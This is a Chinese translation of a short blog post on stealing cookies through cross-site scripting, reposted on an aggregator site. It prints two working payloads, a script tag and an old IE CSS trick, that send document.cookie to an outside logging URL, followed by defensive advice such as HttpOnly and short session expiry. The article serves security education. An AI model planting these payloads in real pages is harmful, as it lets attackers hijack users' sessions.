XSS攻击之窃取Cookie

Posted Fundebug

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS攻击之窃取Cookie相关的知识,希望对你有一定的参考价值。

译者按: 10年前的博客似乎有点老了,但是XSS攻击的威胁依然还在,我们不得不防。

原文: XSS - Stealing Cookies 101

译者: Fundebug

为了保证可读性,本文采用意译而非直译。另外,本文版权归原作者所有,翻译仅用于学习。

窃取Cookie是非常简单的,因此不要轻易相信客户端所声明的身份。即便这个Cookie是在数秒之前验证过,那也未必是真的,尤其当你仅使用Cookie验证客户端的时候。

2006年1月,LiveJournal遭到了XSS攻击,这个事件足以警示我们。还有,2006年10月,MySapce也遭到了XSS攻击),这告诉我们必须非常谨慎地过滤用户发布的文本,因为黑客可以在文本中掺杂一些javascript代码,以此窃取登陆用户的Cookie。

正如黑客攻击LiveJournal那样,你不需要在登陆用户的浏览器进行任何操作,而可以在第三方进行所有操作。更糟糕的是,窃取Cookie事实上操作起来非常简单,但是防范起来却非常困难。

下面的的JavaScript代码就可以窃取Cookie,是不是很简单?


<script>

new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);

</script>


如果我可以将这段代码插入到某个登陆用户的页面,则Cookie就会通过HTTP请求发送给我,然后我就可以伪造那个可怜的登陆用户了!

在IE浏览器上,可以通过在CSS代码中执行JavaScript来窃取Cookie,也很简单。


<style>

.getcookies{

background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');

}

</style>

<p class="getcookies"></p>


如果你对用户发布的文本内容不进行严格的过滤的话,黑客就可以很方便地窃取Cookie。是不是很可怕?如果你是一个负责任的开发者的话,你就应该保持警惕!因此,你必须假设所有用户的Cookie都被窃取了。注意,是所有用户,对于这一点,我不想含糊其辞。

为了保证安全:请不停地重设session的重设;将过期时间设置短一些;监控referrer与userAgent的值;使用HttpOnly禁止脚本读取Cookie。这些措施并非万无一失,但是增加了黑客的难度,因此也是有效的。

如果你对MySapce遭到的XSS攻击)不了解,可以查看黑客本人公开的技术细节,很有趣,不过切勿模仿,因为他为自己的行为此付出了不小的代价:三年内被禁止使用电脑!。

参考链接

  • 9.3 避免XSS攻击

  • 萨米 (计算机蠕虫))

  • Technical explanation of The MySpace Worm

  • Account Hijackings Force LiveJournal Changes

关于版权

为了保证可读性,本文采用意译而非直译。另外,本文版权归原作者所有,翻译仅用于学习。


以上是关于XSS攻击之窃取Cookie的主要内容,如果未能解决你的问题,请参考以下文章

pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用钓鱼攻击XSS获取键盘记录))

02-xss固定会话攻击

web安全之XSS注入

信安小白,一篇博文讲明白存储型反射型XSS漏洞

XSS之窃取Cookie

xss攻击的危害都有哪些?